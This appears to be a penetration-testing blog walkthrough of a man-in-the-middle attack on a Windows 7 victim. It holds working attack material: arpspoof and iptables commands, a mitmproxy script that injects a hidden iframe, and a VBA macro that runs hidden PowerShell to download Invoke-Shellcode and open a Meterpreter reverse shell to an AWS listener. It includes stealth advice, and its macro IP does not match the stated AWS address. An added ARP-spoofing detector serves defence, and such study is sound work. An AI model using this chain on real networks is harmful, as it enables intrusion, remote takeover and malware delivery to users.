The idea behind this particular attack is to inject a reference to a malicious file into the victim's HTTP traffic when they visit a non-HTTPS web page. For example, the default home page for Internet Explorer is http://www.msn.com, which is served over plain HTTP. So, once a successful MiTM attack is in place, we can inject our malicious file into that page when the victim opens their browser, in the hope that they will run it.
Local LAN attack box: 172.17.130.53 (Kali Linux)
Local LAN victim: 172.17.130.75 (Windows 7 with IE 11, fully patched)
Public AWS server: 18.104.22.168
Internal AWS LAN IP: 172.31.18.189
Ideally, we want to remain undetected by AV, so the malicious code is embedded in a macro-enabled Excel document (.xlsm) rather than shipped as an executable. If/when the victim opens the file and clicks to enable macros when prompted, a PowerShell command is executed that downloads Invoke-Shellcode (written by Matt Graeber) and runs it entirely in memory, so nothing is written to disk for AV to scan.
First, we need to craft our malicious Excel document. This is covered in a separate post, but the basic VBA code looks like this (Auto_Open runs when the workbook is opened and macros are enabled; the PowerShell process is launched hidden, with the execution policy bypassed, and stages Invoke-Shellcode straight from GitHub):
' Runs automatically when the workbook is opened and macros are enabled
Private Sub Auto_Open()
    Dim strCommand As String
    Dim WshShell As Object
    Dim WshShellExec As Object
    ' Hidden, non-interactive PowerShell: download Invoke-Shellcode into memory and
    ' inject a reverse_https Meterpreter stager that calls back to our AWS listener
    strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 22.214.171.124 -Lport 8443"
    Set WshShell = CreateObject("WScript.Shell")
    ' Exec spawns powershell.exe as a separate process, so it outlives Excel
    Set WshShellExec = WshShell.Exec(strCommand)
End Sub
We also need a place to host our malicious file; the directory on the AWS web server is seen below:
Next, we set up our Metasploit listener, which is being done on the AWS box. The handler binds to the instance's internal address; the public address in the macro's -Lhost is what the victim actually connects to, and AWS forwards that traffic to the instance. Note that the handler's port option is LPORT, not PORT, and it must match the -Lport given to Invoke-Shellcode:
./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 8443; run"
AWS NAT rules to forward incoming 8443 traffic:
We now need to execute a MiTM attack on the victim. If we check the ARP table on our victim PC, we can see how it looks before ARP spoofing:
After running the following three commands on our local attack box, we'll have successfully implemented our MiTM attack. The first enables IP forwarding so that the traffic we intercept still reaches its destination (without it, the victim simply loses connectivity, which is an obvious tell). The two arpspoof commands each run in the foreground, so start them in separate terminals: the first tells the router that our MAC belongs to the victim's IP, and the second tells the victim that our MAC belongs to the router's IP, so both directions of the conversation pass through us. Substitute the real addresses for routerIP and victimIP (the victim here is 172.17.130.75):
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t routerIP victimIP
arpspoof -i eth0 -t victimIP routerIP
Below is what we’ll see, on our local attack box:
If we look again at the victim PC, we can see the change to the ARP tables:
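The ARP-table change just described is also the simplest thing a defender can watch for on the victim side. The following is an added example, not part of the original post: it parses the output of the Windows `arp -a` command (the victim here is Windows 7) and flags the two symptoms of arpspoof poisoning, namely the gateway's MAC differing from a known-good baseline, and one MAC address being claimed by more than one IP. The sample table, the router IP 172.17.130.1 and the attacker MAC are constructed for the example; the post does not state them.

```python
import re
import subprocess
from collections import defaultdict

# Constructed sample of "arp -a" on the victim after poisoning. The router IP
# (172.17.130.1) and the MAC 00-11-22-33-44-55 are assumed values; note the
# attacker's IP (172.17.130.53) and the router now resolve to the same MAC.
SAMPLE_ARP_OUTPUT = """
Interface: 172.17.130.75 --- 0xb
  Internet Address      Physical Address      Type
  172.17.130.1          00-11-22-33-44-55     dynamic
  172.17.130.53         00-11-22-33-44-55     dynamic
  172.17.130.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One Windows ARP entry: IPv4 address, MAC (dash or colon separated), type.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return {ip: mac} for the dynamic entries in Windows 'arp -a' output.

    Static entries (broadcast, multicast) are skipped: they are never the
    result of a spoofed reply, and they would only add noise to the checks.
    """
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m and m.group(3).lower() == "dynamic":
            # Normalise to lower-case, dash-separated form for comparison
            table[m.group(1)] = m.group(2).lower().replace(":", "-")
    return table


def find_duplicate_macs(table):
    """MACs claimed by more than one IP, the classic arpspoof signature.

    Only fires if the attacker's own IP happens to be cached alongside the
    poisoned gateway entry, so pair it with gateway_changed() below.
    """
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(table, gateway_ip, known_mac):
    """True if the gateway is cached under a MAC other than the baseline.

    The baseline must be recorded while the network is known to be clean;
    a missing gateway entry is not treated as a change.
    """
    current = table.get(gateway_ip)
    return current is not None and current != known_mac.lower().replace(":", "-")


def check_live(gateway_ip, known_mac):
    """Run 'arp -a' on this host and return (gateway_changed, duplicates)."""
    out = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
    table = parse_arp_table(out)
    return gateway_changed(table, gateway_ip, known_mac), find_duplicate_macs(table)


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_OUTPUT)
    print("gateway MAC changed:", gateway_changed(table, "172.17.130.1", "AA-BB-CC-DD-EE-FF"))
    print("duplicate MACs:", find_duplicate_macs(table))
```

Run on a real host, `check_live("172.17.130.1", "<baseline MAC>")` gives the same two answers from the live cache; the baseline MAC has to come from a clean capture, since a duplicate-only check misses a poisoning where the attacker's own address never enters the victim's cache.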
Once the MiTM attack is fully in place, we can execute the following two commands on our local attack box to redirect all traffic arriving on port 80 to port 8080, where mitmproxy is listening:
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
./mitmproxy -T -s "iframe_injector.py http://aws.shellgam3.com/files/2016%20Employee%20Salaries.xlsm"
The -T flag runs mitmproxy in transparent proxy mode, so it accepts the redirected connections on port 8080 (its default port) and works out the real destination from the Host header rather than expecting the browser to be configured to use a proxy. The -s argument loads a script that injects an iframe pointing at our macro-enabled Excel document, hosted on AWS, into the HTML pages the victim's browser receives. (These flags are from the mitmproxy release current at the time of writing; newer releases use --mode transparent and load scripts with -s script.py, passing arguments via --set options instead of on the script line.)
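The post does not include iframe_injector.py itself. The following is an added example of what such a script has to do, written against the modern mitmproxy addon API (module-level `response(flow)` hook, loaded with `mitmdump --mode transparent -s inject.py`) rather than the older `-s "script.py args"` form used above; it is not the post's script. The injection logic is kept in plain functions so it can be run and tested without mitmproxy, and the payload URL is fixed in a constant (an assumption; the original passes it on the command line). The two practitioner details it handles are that only successful text/html responses get touched (injecting into JSON, images or redirects breaks the page and draws attention) and that a page with no closing body tag still gets the iframe.

```python
import re

# Assumption for this example: the hosted .xlsm URL is fixed here rather than
# passed as a script argument as in the post's command line.
FILE_URL = "http://aws.shellgam3.com/files/2016%20Employee%20Salaries.xlsm"

# Match </body> case-insensitively, tolerating whitespace before the '>'
BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)


def build_iframe(url):
    """A zero-size, invisible frame. The browser still fetches its src, and
    because the target is an .xlsm it prompts the victim to open or save it."""
    return (
        '<iframe src="%s" width="0" height="0" frameborder="0" '
        'style="display:none"></iframe>' % url
    ).encode("ascii")


def is_injectable(status_code, headers):
    """Only touch successful HTML documents.

    headers is any mapping with a .get(); mitmproxy's Headers looks up
    names case-insensitively, a plain dict needs the lower-case key.
    """
    ctype = headers.get("content-type", "") or ""
    return status_code == 200 and ctype.lower().startswith("text/html")


def inject_iframe(body, url=FILE_URL):
    """Insert the iframe just before </body> so it renders inside the page.

    If the document has no closing body tag (truncated or sloppy HTML),
    append the iframe instead; browsers still render it.
    """
    tag = build_iframe(url)
    m = BODY_CLOSE.search(body)
    if m:
        return body[:m.start()] + tag + body[m.start():]
    return body + tag


# mitmproxy hook: called once per completed server response. flow.response.content
# is the body with any Content-Encoding already removed; assigning to it makes
# mitmproxy re-encode the body and fix Content-Length before forwarding it.
def response(flow):
    resp = flow.response
    if is_injectable(resp.status_code, resp.headers):
        resp.content = inject_iframe(resp.content)
```

One thing to keep in mind when adapting this: the hook fires for every HTML response the victim loads, including those in other tabs and sub-frames, so a real engagement script would normally inject once per client (for example by remembering `flow.client_conn.peername`) to avoid a stack of download prompts that gives the game away.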
When the victim visits any non-HTTPS site (like MSN.com), they should see something similar to the following within their browser, as the hidden iframe prompts them to open or save the spreadsheet:
Within the mitmproxy console, we should see the injection:
When the file is opened by the victim and macros are enabled, we should (hopefully) have our reverse shell. Even when the victim closes Excel, the shell should persist: the macro launched powershell.exe as a separate process, and Windows does not kill a child process just because its parent exits, so the Meterpreter session lives on inside PowerShell.